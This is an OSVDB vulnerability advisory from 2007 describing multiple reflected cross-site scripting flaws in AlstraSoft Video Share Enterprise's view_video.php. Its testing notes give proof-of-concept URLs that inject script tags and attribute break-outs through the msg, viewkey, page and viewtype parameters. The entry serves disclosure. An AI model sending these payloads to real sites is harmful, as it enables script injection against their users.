AlstraSoft Video Share Enterprise view_video.php Multiple Variable XSS

2007-07-22T00:00:00
ID OSVDB:37277
Type osvdb
Reporter OSVDB
Modified 2007-07-22T00:00:00

Description

Manual Testing Notes

http://[Victim]/videoshare/view_video.php?viewkey= 9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+ sent+"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?viewkey= 9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr

http://[Victim]/videoshare/view_video.php?viewkey= 9c1d0e3b9ccc3ab651bc"><script>alert()</script>

http://[Victim]/videoshare/view_video.php? viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr

References:

Related OSVDB ID: 37279 Related OSVDB ID: 37280 Related OSVDB ID: 37282 Related OSVDB ID: 37283 Related OSVDB ID: 37278 Related OSVDB ID: 37281 Related OSVDB ID: 37284 Other Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html CVE-2007-4077